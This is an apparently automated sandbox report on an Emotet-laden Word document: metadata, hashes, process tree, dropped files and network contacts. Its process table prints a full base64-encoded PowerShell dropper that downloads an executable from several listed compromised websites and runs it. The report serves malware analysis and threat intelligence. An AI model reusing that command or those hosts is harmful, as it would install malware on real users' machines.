File name: | US W2D7.doc |
Full analysis: | https://app.any.run/tasks/1164595b-9c12-4b50-a9ba-8ebe9d432af0 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 13:55:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Angelina Rogala, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 31 14:52:00 2019, Last Saved Time/Date: Thu Oct 31 14:52:00 2019, Number of Pages: 1, Number of Words: 41, Number of Characters: 235, Security: 0 |
MD5: | 320984A7E9A47491F6F0F63674F48274 |
SHA1: | 5EDBAC5546D613DBE3B554000B6AAA28B9888E12 |
SHA256: | C6A6E56EC50F0897ACDE526364F3ECBFC4531A720E5B039C532FDDB48CB32C2C |
SSDEEP: | 6144:ZlTO4wYoHNaqjSzGwD48+aPOnyEy0Pbla3gx:ZlTO4wYuaeWGt8+qOnyN0xNx |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 275 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Sowinski and Sons |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 235 |
Words: | 41 |
Pages: | 1 |
ModifyDate: | 2019:10:31 14:52:00 |
CreateDate: | 2019:10:31 14:52:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Angelina Rogala |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\US W2D7.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3100 | PoWersHell -EncoD PAAjACAAWAByAHQAdABvAGoAcgB6AHcAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ATABmAHoAYQBzAHQAcgBlAGQAIAAjAD4AIAAkAE0AaQBsAHYAaQB1AGcAdgBhAHQAPQAnAFQAaQBoAGwAYgBwAGgAcgBsAGYAZQBiACcAOwAkAEgAbwBrAG4AbABuAGUAegBiAGgAYwAgAD0AIAAnADIANgA3ACcAOwAkAEcAaQBxAHgAagBpAG0AZgBsAD0AJwBCAHcAdABiAGkAbABiAGsAZwByAGsAaAAnADsAJABaAGYAeABpAHcAdwB6AHEAYQBhAGYAcAB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAG8AawBuAGwAbgBlAHoAYgBoAGMAKwAnAC4AZQB4AGUAJwA7ACQAVwBmAHoAZwBkAGsAbwB2AHAAegBtAD0AJwBCAGwAZwBkAHcAZABpAG8AawB4AGoAeAB0ACcAOwAkAEwAdwBxAGQAZgByAGEAbwBmAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAFcAZQBCAGMATABJAGUATgB0ADsAJABRAHQAbAB0AHYAZgBxAGYAdAByAGIAaQA9ACcAaAB0AHQAcAA6AC8ALwBuAGUAdwAuAGEAbABmAGEAcgBlAG4AZwBpAG4AaQBhAGkALgBsAHQALwB3AHAALQBhAGQAbQBpAG4ALwBNAEoAUwBYAHcATgBaAG8ALwAqAGgAdAB0AHAAOgAvAC8AegBpAG4AYQAuAGgALQBpAGQAZQAuAHAAbAAvAGcAcAA5AGEAYQBrAHgALwBpAFcAZAB1AFcAdQBkAGwAYwAvACoAaAB0AHQAcAA6AC8ALwBzAHQAYQBnAGkAbgBnAC4AdABhAGwAbwBuAC0AZQBuAGcALgBjAG8ALgB1AGsALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZgB0AGYAZgBtADcAaQB5ADcALQBvADYAOQA4AGsANgBwAGQANQAtADgAOAA3ADYAMAAyADgAOQAvACoAaAB0AHQAcABzADoALwAvAGUAbABlAGsAdAByAG8ALgBwAG8AbABzAHIAaQAuAGEAYwAuAGkAZAAvAHMAYwByAGkAcAB0AHMAbwAvAG4AdABnAEgAUgBVAGMALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGgAbwByAG8AcwBoAGEAcwB0AGgAbwBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATQBIAHUAZgBWAFkASAAvACcALgAiAHMAUABgAGwAaQB0ACIAKAAnACoAJwApADsAJABHAG4AdwBiAGIAaQBtAGMAbgB6AGgAeQBlAD0AJwBUAHAAeQBwAGEAegBhAG8AbwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBzAHkAaABkAGIAbwBzAGIAcwB6ACAAaQBuACAAJABRAHQAbAB0AHYAZgBxAGYAdAByAGIAaQApAHsAdAByAHkAewAkAEwAdwBxAGQAZgByAGEAbwBmAC4AIgBEAE8AdwBOAGAATABvAEEAYABEAGYASQBsAGUAIgAoACQAQQBzAHkAaABkAGIAbwBzAGIAcwB6ACwAIAAkAFoAZgB4AGkAdwB3AHoAcQBhAGEAZgBwAHoAKQA7ACQAQgBsAGkAcABqAGoAagBzAHAAPQAnAEwAaQBuAG8AaQBzAGUAbwAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFoAZgB4AGkAdwB3AHoAcQBhAGEAZgBwAHoAKQAuACIAbABlAE4AYABnAFQAaAAiACAALQBnAGUAIAAyADMAOQA5ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAQQBSAFQAIgAoACQAWgBmAHgAaQB3AHcAegBxAGEAYQBmAHAAegApADsAJABEAGQAdQB5AGQAegB3AGYAeQBoAD0AJwBIAGIAdQB4AHAAeABvAG0AcABlAHEAZAAnADsAYgByAGUAYQBrADsAJABMAHEAaABrAHoAegBjAHMAPQAnAFUAawBmAGsAdgBqAGQAdgBuACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE4AbwB2AG8AcQByAHIAcwB6AD0AJwBIAGIAbgBnAHkAbwBpAHkAcwBwAHQAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\PoWersHell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAA35.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F53520E8.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5771BC9.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2BF7F36.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCAEF9BF.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\500BC8B4.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C24E925.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\276194E2.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B589B7B.wmf | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F075E740.wmf | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3100 | PoWersHell.exe | GET | — | 79.98.29.5:80 | http://new.alfarenginiai.lt/wp-admin/MJSXwNZo/ | LT | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3100 | PoWersHell.exe | 79.98.29.5:80 | new.alfarenginiai.lt | UAB Rakrejus | LT | malicious |
Domain | IP | Reputation |
---|---|---|
new.alfarenginiai.lt |
| malicious |